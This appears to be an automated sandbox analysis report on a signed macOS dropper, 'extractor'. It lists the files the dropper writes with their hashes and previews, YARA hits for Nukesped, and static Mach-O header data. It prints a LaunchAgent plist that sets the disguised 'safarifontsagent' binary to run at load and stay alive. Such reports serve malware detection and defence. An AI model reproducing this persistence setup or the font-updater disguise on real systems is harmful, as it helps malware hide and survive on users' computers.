SHA-512:	E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Info.plist

Download File

Process:	/usr/bin/tar
File Type:	XML 1.0 document, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1573
Entropy (8bit):	5.15430518157656
Encrypted:	false
SSDEEP:	24:2dfyiwBFAw6wBh1Ma6w4oRw0gp/sH2PggjeeDbMMcoK/fV2+3NrGuh:cfyfyQBh1cw1O0giH2IgSOb1XKl2+dSg
MD5:	C15E31E36E539D5D9CB1128BBE15D395
SHA1:	B048FF7D1D22DE090E29F34AAA408F0685CB0D02
SHA-256:	484DA0EC3AD87282F44387F45ACB1D4B5BA8334012F12AE6074798056F7FF7FE
SHA-512:	065D5B92E9EEFABED21369CC5F924E4FBA40C3FCF6334C5D83C35B44BA78333267D10EF36134864D941EA161A26CBF1976E2ED342A51C88EEDE1540760E9F6B0
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>21F79</string>..<key>CFBundleDevelopmentRegion</key>..<string>en</string>..<key>CFBundleExecutable</key>..<string>FinderFontsUpdater</string>..<key>CFBundleIdentifier</key>..<string>finder.fonts.extractor</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>FinderFontsUpdater</string>..<key>CFBundlePackageType</key>..<string>APPL</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>13C100</string>..<key>DTPlatformNa

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater

Download File

Process:	/usr/bin/tar
File Type:	Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>]
Category:	dropped
Size (bytes):	186240
Entropy (8bit):	3.3442384430459433
Encrypted:	false
SSDEEP:	1536:2i39V8ffffffffffffffffA3d7GbYpwNevg2KSf/6n2aVK:39V8ffffffffffffffffQlGvO1NHK
MD5:	FC5D8C6CCF10D0B900BAA394D2EAD97D
SHA1:	041AFAF8EF2A8556AAC3FB051E52D19219552E9D
SHA-256:	798020270861FDD6C293AE8BA13E86E100CE048830F86233910A2826FACD4272
SHA-512:	A5E66C67CA27255A7531AA5966ADA6ABF3F201037AD24FEA9FBF0ED7D783C6C9CEFD5122D9F7F7731AE33271BF08B4DA5689FA1D1C238862A5D72E44BAFDB8E5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Nukesped_2, Description: Yara detected Nukesped, Source: /Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	..................@...k.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/PkgInfo

Download File

Process:	/usr/bin/tar
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	1.75
Encrypted:	false
SSDEEP:	3:k0Ra:f8
MD5:	23B7D7D024ABB0F558420E098800BF27
SHA1:	9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
SHA-256:	82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
SHA-512:	F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	APPL????

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Resources/en.lproj/Credits.rtf

Download File

Process:	/usr/bin/tar
File Type:	Rich Text Format data, unknown version
Category:	dropped
Size (bytes):	436
Entropy (8bit):	4.962904598670011
Encrypted:	false
SSDEEP:	6:edsqSm+BhYrJDeXsVamc7QTf9KX6UVlWmVPOeIWXFflm0yD8AqriAke+2QxRo59v:5qSmsYinmY25MlWmVPOKIJQjiAke+pwN
MD5:	F0D4A61CAF597423FF07C5E9B24A345E
SHA1:	60A248148B319DE26E36424D25021C2488E23CE8
SHA-256:	B4386FE1CEF65CD91E6C8ECC065D117089083F91B7CADBF0C3E5EAE20E8B9640
SHA-512:	E361011499CF70FC71E247FDDA71F49D913654A983AA4AE67D00DC977E53B9CF0D88D4D2AC07EFE248261C3AB6E3345E829E22DDA3E51DCCC221A94C660ACE69
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{\rtf0\ansi{\fonttbl\f0\fswiss Helvetica;}.{\colortbl;\red255\green255\blue255;}.\paperw9840\paperh8400.\pard\tx560\tx1120\tx1680\tx2240\tx2800\tx3360\tx3920\tx4480\tx5040\tx5600\tx6160\tx6720\ql\qnatural..\f0\b\fs24 \cf0 Engineering:.\b0 \..Some people\.\..\b Human Interface Design:.\b0 \..Some other people\.\..\b Testing:.\b0 \..Hopefully not nobody\.\..\b Documentation:.\b0 \..Whoever\.\..\b With special thanks to:.\b0 \..Mom\.}.

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Resources/en.lproj/InfoPlist.strings

Download File

Process:	/usr/bin/tar
File Type:	Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	92
Entropy (8bit):	3.2610300066712608
Encrypted:	false
SSDEEP:	3:Qwh+yEilSlJlqXMLLkFlVlRDBWjUoFY9n:QpXioJqcLwVlRNWwou9n
MD5:	51EF59B60E5B41B91519CC662A9FE886
SHA1:	3222CA0C39EB50AAF8126BAF852E55430C4718AF
SHA-256:	39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
SHA-512:	3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	../.. .L.o.c.a.l.i.z.e.d. .v.e.r.s.i.o.n.s. .o.f. .I.n.f.o...p.l.i.s.t. .k.e.y.s. ../.....

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Resources/en.lproj/MainMenu.nib/keyedobjects-101300.nib

Download File

Process:	/usr/bin/tar
File Type:	data
Category:	dropped
Size (bytes):	22249
Entropy (8bit):	5.639194002428614
Encrypted:	false
SSDEEP:	384:ytC1Al51MJpFIJ27Q/XZ8XiQqO04itpAfkKQitevBnk3:y+AlHSp5A8XiQJ04+pAfFQ+evBO
MD5:	83719FD98251D7F540E0281E3E03A321
SHA1:	E266D0D03CD5138DA9254E107CDEDF2BFC0C3CD9
SHA-256:	BA09E35790C9D3DA55ECC913BF07EC3EFF97760DB302A4B8DE432C62C7A394DC
SHA-512:	BC903033B636BB6553370E6B197042E5CDB8998D6F4D7A73C59A4C5A2AC6A7ABC84DB5324644A548F18599328B04D77C32DB802EAF5C46316BA9D3E1ADE20978
Malicious:	false
Reputation:	low
Preview:	NIBArchive............2...C....................U............................................................................................ ...!...#...$...)......,...-.......0...9...:...;...<...?...G...H...I...K...T...U...V...W...Y...b...c...d...e...g...p...q...r...s...u........................................................... ...(...)......,...5...6...7...9...B...C...D...E...H...Q...R...S...T...U...W...`...a...b...d...m...n...o...q...z...{...\|...~......................................."...#...$...%...'...0...1...2...3...5...>...?...@...A...C...L...M...N...P...Y...Z...[...\...^...g...h...i...j...l...u...v...w...x...z....................................... ...!..."...#...%.../...0...1...3...<...=...>...?...A...J...K...L...N...X...Y...Z...\...e...f...g...i...r...s...t...u...w...................................................)...*...+...-...7...8...9...<...E...F...G...H...I...L...V...W...X...Y...\...f...g...h...j...s...t...u...v...y....................................... ...!..."..

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Resources/en.lproj/MainMenu.nib/keyedobjects.nib

Download File

Process:	/usr/bin/tar
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	29085
Entropy (8bit):	6.962852813594106
Encrypted:	false
SSDEEP:	768:Ry7gv8jB0RS53OiveWgZf3TUh31wtgUYt/CRQif/Qf2:Y7gv8jB0Ro+iveW/h36t9i/Cmk/Qf2
MD5:	B1F27FBE4245B3EA320ABB1C4E9BDE54
SHA1:	1942918DF0286004EC08ED95EF94D236C4BDBABC
SHA-256:	766EBE8C195FBAC9EE6131CA3C524ADC64C0EA92CBF34EB6A95F88B81946032A
SHA-512:	666ABF8D010D5C26BB7778EA4C6E4D774AEAEF7E1516FCC8F2E1D50A1394A96B9662D5ED2728F2B5CE415F0EC471A08BC5429506488BCEB586503F9984A16D52
Malicious:	false
Reputation:	low
Preview:	bplist00.................X$versionY$archiverT$topX$objects....._..NSKeyedArchiver........._..IB.systemFontUpdateVersion]IB.objectdata.............%.).*.0.5.Q.R.S.T.f.g.k.l.m.p.t.......................................!.(.).,.-.0.1.5.9.B.C.D.E.J.S.X.Y.Z.^.g.k.l.m.n.r.{.\|.}.~.............................................................................................&.'.(.,.5.9.:.;.?.H.I.J.N.W.[.\.].^.b.k.l.m.n.r.{.\|.}.~...........................................................................................".#.$.%.).2.3.4.8.B.C.D.H.Q.R.S.W.`.d.e.f.g.k.t.u.v.z....................................................................................... .!.".&./.0.1.2.6.?.@.A.E.N.O.P.T.].a.b.c.g.p.q.r.v..................................................................................... .$.-.../.3.<.=.>.B.K.L.M.Q.Z.[.\.`.i.j.k.o.x.y.z.~.........................................................................................!.".#.'.0.1.2.6.?.@.A.E.N.O.S.\.].a.j.k.o.y.z.~.......'.8.9.G.T.].^._.j.

/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/_CodeSignature/CodeResources

Download File

Process:	/usr/bin/tar
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	4022
Entropy (8bit):	5.053079564031308
Encrypted:	false
SSDEEP:	96:CyhCcNfFhxr2acTDfkhxlkYT2BLDzFNQpO/YTbJvy:XRNdLuPsLlEDzko
MD5:	7DF6D87BE250F96F11D6ACE4E2EC01A2
SHA1:	3732A48FD1C48BFAEEA8D1680935BFE18B853D97
SHA-256:	90CD523AB11FF5AD239F40C06A085B506A489E829B3038D6DFCBF562467A1A09
SHA-512:	56E7B85EAB8DB6848EB33C3A7DF76C337EFA98B8F10E0B555DFFC5BDBAEE17CEEA32833DA9B32842EAAC2B123D42F898CF7679E901B3824B5AF9EA58598534A0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/en.lproj/Credits.rtf</key>...<dict>....<key>hash</key>....<data>....YKJIFIsxneJuNkJNJQIcJIjiPOg=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/en.lproj/InfoPlist.strings</key>...<dict>....<key>hash</key>....<data>....MiLKDDnrUKr4EmuvhS5VQwxHGK8=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/en.lproj/MainMenu.nib/keyedobjects-101300.nib</key>...<dict>....<key>hash</key>....<data>....4mbQ0DzVE42pJU4QfN7fK/wMPNk=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/en.lproj/MainMenu.nib/keyedobjects.nib</key>...<dict>....<key>hash</key>....<data>....GUKRjfAoYATsCO2V75TSNsS9urw=....</data>....<key>optional</key>....<true/>...</dict>..</dict>..<key>files2</key>..<dict>...<key>Resources/en.lproj/Credits.rtf</key

/Users/drew/Library/Fonts/fontsupdater_

Download File

Process:	/Users/drew/Desktop/extractor
File Type:	gzip compressed data, last modified: Thu Jul 21 14:42:59 2022, from Unix
Category:	dropped
Size (bytes):	60554
Entropy (8bit):	7.990008230981145
Encrypted:	true
SSDEEP:	1536:bqTQi4Qcocdlcd4BEaCiA95VpjEwE6uXjJUquN/lM9dEn9iZx8M:OMpj3cdeEaRG5sp7XjJ4ZlWew8M
MD5:	11254CB76109B288873E2E83B5F9B811
SHA1:	EE4B2A77BFE4C5A436269DD4E9F6338185B1C7BF
SHA-256:	35C094F9389B41ABB55ACB9159AF36730B69722F351F0D8DF4B32A11711A5F02
SHA-512:	7DF31546D64C758AC4A4BEC6D91CD7C74E64A4B0DE8B6341D1CB96B47262267FD26B516DA9BEDC6C018DDD8D51E4F7DE7B076F26752AF4FEC6C3E721523546BD
Malicious:	false
Preview:	.....e.b....@Sg.6~.E...j[Wq...q.."....QS..$..y.......a.....m..{....].}.."..............9.}?{$....}......"W..Kq......?...}{.N..>.kj.^.k.'9.W.>}z.IK..395.w..T)....F~......,.c.....~0....%?.....$....i............o.....3.E.l..RW....{../...i}......S..DW...s.....g.T.?...O..7~NU.S.~o............O.......s...[:.RV.......G.^......^......_)9.?........AC...'/r...o..vi)....."O.........!.AmGL..1yd2....S.O....{......=z....<y...d...cdf..v.....=z,^.X4.bwJ..D...1..-s..K'@Yw<.R.(j.3..z. ..S..b..Z.^:dx.......O.{R6I.z.7.?...Cz.....P...\|.c....b..."w.....{.{>.D?..m..K...WA.;...{Qc:....g.G.Q_.<.2O(Iq/..\..o.z./G.X...oi.^`....6.\|......dW.B.\|w......<yBc.e/...A_......8...~f(~.}....6.E..].y^_.?....s....Z.L...#tO=...vZ..#r2.%e.....C......E%)....)i.'...P..l.i..i.1.j..K\.^...i,.=S..i...t.^}...q...0.c.I....l..PN..'zJ=%.%.K..w..OM...df....W....H.....>.....g.o$?pur..~...J..D).....]....w....RN.4..).....<...&.K.O~h2.BO..8....G?..-.oO.+@..=<..>...A......$......S..&/./...

/Users/drew/Library/Fonts/safarifontsagent

Download File

Process:	/usr/bin/tar
File Type:	Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>]
Category:	dropped
Size (bytes):	153424
Entropy (8bit):	2.424111241614667
Encrypted:	false
SSDEEP:	768:1kVx5g+Mk9F8+Vab8WuLb6Gzn6E8oVab8:yVD59FvVK2H6GGE9VK
MD5:	DED8CAC968D278AEB2889DC7552E46E1
SHA1:	605214C45F2D7EA8D41125558DD8AD3B6AE92B57
SHA-256:	49046DFEAEFC59747E45E013F3AB5A2895B4245CFAA218DD2863D86451104506
SHA-512:	A16ACA216041F2322BFBA25665CEA7FC1C896C3B05005E97789C4E505B7DB158223205ED77ACA8F0620ADA5599DF7D67AE17744E260C3E5EBBB6AE522048E439
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Nukesped_2, Description: Yara detected Nukesped, Source: /Users/drew/Library/Fonts/safarifontsagent, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	..................@....@..............@....P............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

/Users/drew/Library/Fonts/safarifontsagent_

Download File

Process:	/Users/drew/Desktop/extractor
File Type:	gzip compressed data, last modified: Thu Jul 21 14:42:15 2022, from Unix
Category:	dropped
Size (bytes):	22631
Entropy (8bit):	7.9764733074201555
Encrypted:	false
SSDEEP:	384:XRgyWYu6xpOjtd4L2VQnYU/405uk9BBAhp58FPrmkx1sYekPWxliDFpzmU3Iy2YW:Xa1Yu6xpikrY+4/SBEp50Tzx6dkPWniI
MD5:	0862E2DB7C590EB428B8E22370BE253C
SHA1:	838F9F17D6476B690D3CA6394F1DD41F5C2BCEDB
SHA-256:	A0BE0CDAE4DBF89631EEED2DB3A92791B3D9E5E8FDA438D26D2DC81FF5712D1A
SHA-512:	78D622BE240B59F8B18EFAEE19059EA44CB990541AADE14891F350627A1BA18C1379873C85CA90CB9E9D3F5AC6DB95BCEAD11D182F4A7F30B872A47818BE531F
Malicious:	true
Preview:	.....e.b....X.Y.?>.....Dl(..:...+...k.!@ $1...J..X.......]{]..]w]..j\.ZP......Btw.......{...y.3.\|n9..ms.f....T.T.\...I..._.........g4...h.......\|......)..>%....'...3..VkD.J."K.w.Xj....7C.....N..w...$.3.\...u.]l!..D.%..Q...................................................................O...........i... ..\|:.5H4.P....9"2!.S...........L.....F.Xn.).,.j$..o.0........7..(0.B.Z....K.U=...dS..9...0]"SJT..w..S....9..?.B.......3...8..k.?.F%.....Z._9....5.+]?[.#.....T.g.).0...pc..@.D~"....d....#.eE.W.P.....2.R..K....k.....}.)4MxS..?{.n..I}.......$...?...A..)"...W.....i...N..}l.....1.9-`..#..e4I4...P.b..6.m.^.@.Z.....O..V I.Q..%.......g....q ..3F.t..........N.../.4.+%O...e....?...s.^....._wb.&,,...Dw.q..`...z;......d}2S`A.Ylh.D...y.zB/...(.z.m<t.M.{..j...bb\>1O..dy.5l..{...L.n,G.....2......8.......................................D...]Z.=...Vp.........).n.Q..641..U.......D$.l.=..I.3.u#..0...K.iK.(.j_zR.j...n.V..............J.......*m....QA?;.Wa....N..

/Users/drew/Library/LaunchAgents/com.safari.fontsyncagent.plist

Download File

Process:	/Users/drew/Desktop/extractor
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	457
Entropy (8bit):	5.224719870128861
Encrypted:	false
SSDEEP:	12:TMHd4+tJVEdQsv9SPBnDho+48OWOjM1MH+EM+4bP+v:2d6ysvIBdoVBvM0jMVDE
MD5:	ABD8D1D28B44573C2A1594F4502E314C
SHA1:	53761AF4D1F64E1EADB762501C47F7233EBC128A
SHA-256:	3B773DF5DD1586AB88C3782ED56998FE832623C6ECF64CD9B109B06A3BC36302
SHA-512:	83F18845347D0E5106CBB2DBEB6FE073E1194FEA353011E8BB7455B84501C2E8071EC8A522E21762F01AEC2AAEB3489652F6EB0DDF39694596541ECDFE3F8E67
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>Label</key>...<string>iTunes_trush</string>...<key>OnDemand</key>...<true/>...<key>ProgramArguments</key>...<array>....<string>/Users/drew/Library/Fonts/safarifontsagent</string>...</array>...<key>RunAtLoad</key>...<true/>...<key>KeepAlive</key>...<true/>..</dict>..</plist>..

/dev/null

Download File

Process:	/System/Applications/Preview.app/Contents/MacOS/Preview
File Type:	ASCII text
Category:	dropped
Size (bytes):	523
Entropy (8bit):	5.182041805967763
Encrypted:	false
SSDEEP:	12:d7offKtrPtXhF4FS5X4QiKIwfPRUypYmEytPv:wuzBhF4FyV1fpdphpv
MD5:	1ECA6980DC7F0CB67A961CD2E95BEF37
SHA1:	70B26F798E9CEF560740095744DA7222704E94F6
SHA-256:	FDF3720B4A8E1792743DDF504429BABB71744F391F3A97D94F84DD381EA7EF12
SHA-512:	1FAB308390847F95D90DB8E94143042450B57C00387210E122119C6782043AA838A3D9503DD02D9C04CBC1205487032416BF1862A9E5C3338B5341D5E8D66957
Malicious:	false
Preview:	2022-08-18 14:34:24.588 Preview[871:10394] ApplePersistence=NO.2022-08-18 14:34:24.699 Preview[871:10394] WARNING: The SplitView is not layer-backed, but trying to use overlay sidebars.. implicitly layer-backing for now. Please file a radar against this app if you see this..2022-08-18 14:34:25.102 Preview[871:10394] Warning: Unable to complete drawing page index 0 on time as a request to forceUpdateActivePageIndex:withMaxDuration: 0.25.2022-08-18 14:34:27.372 Preview[871:10394] +[NSSavePanel _warmUp] attempted warmup.

/private/var/folders/mw/_t374r4n1hz_ph6rs1f42z2r0000gn/C/com.apple.Preview/com.apple.Preview/com.apple.metal/16777237_9765376/functions.list

Download File

Process:	/System/Applications/Preview.app/Contents/MacOS/Preview
File Type:	data
Category:	dropped
Size (bytes):	776
Entropy (8bit):	5.923210089718743
Encrypted:	false
SSDEEP:	12:fKZ8h50K/i1eITur/WrSOaXbUf/puB7jyoNlIhrbL:CjuaUeGOaXA3g5Mrv
MD5:	F812D1A4E5719EFAF480553162F0699D
SHA1:	F3E17CDA042562D709A6170A454A5AF620B85B83
SHA-256:	1C2E2A6A40006EC8005F64D362CA36D3E9A3C6A64631656BD7A06C7CA49A6371
SHA-512:	78C0CC2C1C06C0840938F7E47F81E54E30783BDEC580E8172B00C78603834E6966D4BEF56988BDED72A629C52E5B1A4330C9D0C628154BEB15B63A170573894D
Malicious:	false
Preview:	Tcr.s...x...^N....~8..l.........."........E6'..x..............1....M5b@...U.9.Y......wTG>..l.........O.......y......n}y.L.G...yfA.se.q.....@ \..8.......)...vK..............[.%..Y..W.b/.`xM..}[(.r'...g..5.........SM.......K..........5..&..a;....x..>wN._&.?R5.....Dv2_6K................J......)..d.mV.C.s0.u..l?............Q................ .L...8hd..YS=.aV.t......p...........K.......Q......HHEo..p]..`.]\.5.4d!...R...yY.x........O....................c..........6+..1...= ....@.........X..............3h...O..l^..yVH...8.0..."..-..........vK..............l(..^..~\.#..$L,\@.B.i.tQ....9.........U..............NI.V53....vb..X0i.<..b.G.M....GP........b\................c.0h..%........]..C.".%(...7}.........T......@U.......1....G&.....W...._p.................

/private/var/folders/mw/_t374r4n1hz_ph6rs1f42z2r0000gn/C/com.apple.Preview/com.apple.Preview/com.apple.metal/31001/libraries.list

Download File

Process:	/System/Applications/Preview.app/Contents/MacOS/Preview
File Type:	data
Category:	dropped
Size (bytes):	1392
Entropy (8bit):	6.013033529682525
Encrypted:	false
SSDEEP:	24:xk4in2nL4fT0h65unS/daZXvlFt8OKLJQDsIJLt3AQNyHEc1Rt:Jc2nLsTo3ZflFGOMWDvJJA+ykc1
MD5:	9CF9EFB57C920DEAE36CA119DDDECE25
SHA1:	636A0E92FE3B0556AD4B174CE8F2B07D35511904
SHA-256:	C86EF08C752094A5088320168B259C9059D350C67AB60280C974FD9DBA567515
SHA-512:	DC8A485DBBAC9A9B0E6C4C9AEF6D1132F1C942F331A4CCF4F6E4A53276BCF1A25BF26D331CC08BBF0D4660FF8966E01A77F08D829C14CD15BC93FC0AE8A1A10A
Malicious:	false
Preview:	Tcr.....C..N_.^.......]Ai..F.=$.b.....p..E6'.>"............../Lc9......%.%..P.T..7.m...R.v.........."......@"........)....?..\.[#...f.U..M.{.v.................D......&...R.."...e.\|$@}.....H.4.pX...................T......................U..?...5......................c.......c..........H.J..%s.../...Z..M1?....0............s.......j:...>..%;.....u;`R.O](.m..Mw........j.......@........".P.....D.w.$...5...............O.................0 ViPO;._......+....B...............W.......@........Lc.0D....)0.Z.x!i.4z.\|..3IR.{P.........L...................u.... ..O.&l...UO(..o..9..................@...........wa.E.........,J.i.$.(..".%........................V....\..s....R*..yC..I.u;..............!..............<.tE..nuT.Y..I3.Gp..R....VZ.w.......... ......@!......h....m....,......^$L.Gl....i\.................@B......f.Y{..{..a:\e.1...&......g......................X.......L.s...i.....9.Yg...B.....ne....................g.........D.......g.Q.7&e.{.g.....}.K.......0..

Static File Info

General

File type:	Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>]
Entropy (8bit):	7.476280271617914
TrID:	Mac OS X Universal Binary executable (4004/1) 75.96% HSC music composer song (1267/141) 24.04%
File name:	extractor
File size:	958160
MD5:	f97fc3d0dd6b217a92df567ad8f3d555
SHA1:	9306110d082ad86169c76d765c7d334f24747094
SHA256:	fe336a032b564eef07afb2f8a478b0e0a37d9a1a6c4c1e7cd01e404cc5dd2853
SHA512:	f6a8a53f4b242e7ee4a57dbe4f0f107d56be72c226e013bf1157303c4e1f6ecfc1bdf6d799c9bdab20c76c86cc3b997d260cd80922483a7b8a13641e63f79609
SSDEEP:	24576:qx1mymeCXt67AiWH7gHgDx1mymeCXt67AwWH7gH:lymft67AiWHYgiymft67AwWHY
TLSH:	AD15121359086CDED5A8DBB17F0F3D1E3A59B1A1A1C72996362ECEC63710F3A984314E
File Content Preview:	..................@............................................................................................................................................................................................................................................

CodeSign Information

["Executable=/Users/drew/Desktop/extractor","Identifier=SelfExtractor","Format=Mach-O universal (x86_64 arm64)","CodeDirectory v=20500 size=3673 flags=0x10000(runtime) hashes=109+2 location=embedded","VersionPlatform=1","VersionMin=721152","VersionSDK=786688","Hash type=sha256 size=32","CandidateCDHash sha256=113bd58a9fb02fd2bc12ab4aaa62f41203b8ca0e","CandidateCDHashFull sha256=113bd58a9fb02fd2bc12ab4aaa62f41203b8ca0e8817249b5effc30436f78744","Hash choices=sha256","CMSDigest=113bd58a9fb02fd2bc12ab4aaa62f41203b8ca0e8817249b5effc30436f78744","CMSDigestType=2","Executable Segment base=0","Executable Segment limit=16384","Executable Segment flags=0x1","Page size=4096","CDHash=113bd58a9fb02fd2bc12ab4aaa62f41203b8ca0e","Signature size=8978","Authority=Developer ID Application: Shankey Nohria (264HFWQH63)","Authority=Developer ID Certification Authority","Authority=Apple Root CA","Timestamp=21 Jul 2022 at 16:50:38","Info.plist=not bound","TeamIdentifier=264HFWQH63","Runtime Version=12.1.0","Sealed Resources=none","Internal requirements count=1 size=176"]

Static Mach Info

General Information for header 1
Endian:	<
Size:	64-bit
Architecture:	x86_64
Filetype:	execute
Nbr. of load commands:	18
Entry point:	0x3991

segment_command_64 aggregated: 5

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0x4000

fileoff

0x0

filesize

0x4000

maxprot

0x5

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__text	__TEXT	0x100002DFC	0xD44	0x2DFC	6.0298	0x0	0x0	0	0x80000400
__stubs	__TEXT	0x100003B40	0xC0	0x3B40	3.0850	0x1	0x0	0	0x80000408
__stub_helper	__TEXT	0x100003C00	0x150	0x3C00	3.7790	0x2	0x0	0	0x80000400
__cstring	__TEXT	0x100003D50	0x21E	0x3D50	5.0012	0x4	0x0	0	0x2
__unwind_info	__TEXT	0x100003F70	0x84	0x3F70	2.9727	0x2	0x0	0	0x0

Name

Value

segname

__DATA_CONST

vmaddr

0x100004000

vmsize

0x4000

fileoff

0x4000

filesize

0x4000

maxprot

0x3

initprot

0x3

nsects

flags

0x10

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__got	__DATA_CONST	0x100004000	0x10	0x4000	-0.0000	0x3	0x0	0	0x6

Name

Value

segname

__DATA

vmaddr

0x100008000

vmsize

0x64000

fileoff

0x8000

filesize

0x64000

maxprot

0x3

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__la_symbol_ptr	__DATA	0x100008000	0x100	0x8000	2.2173	0x3	0x0	0	0x7
__data	__DATA	0x100008100	0x6210B	0x8100	7.9623	0x4	0x0	0	0x0
__common	__DATA	0x10006A210	0x104	0x0	0.0000	0x4	0x0	0	0x1

Name	Value
segname	__LINKEDIT
vmaddr	0x10006C000
vmsize	0x8000
fileoff	0x6C000
filesize	0x5ED0
maxprot	0x1
initprot	0x1
nsects	0
flags	0x0

dyld_info_command aggregated: 1

Name	Value
rebase_off	442368
rebase_size	8
bind_off	442376
bind_size	48
weak_bind_off	0
weak_bind_size	0
lazy_bind_off	442424
lazy_bind_size	464
export_off	442888
export_size	32

symtab_command aggregated: 1

Name	Value
symoff	442944
nsyms	57
stroff	444120
strsize	632

dysymtab_command aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	22
iextdefsym	22
nextdefsym	1
iundefsym	23
nundefsym	34
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	443856
nindirectsyms	66
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

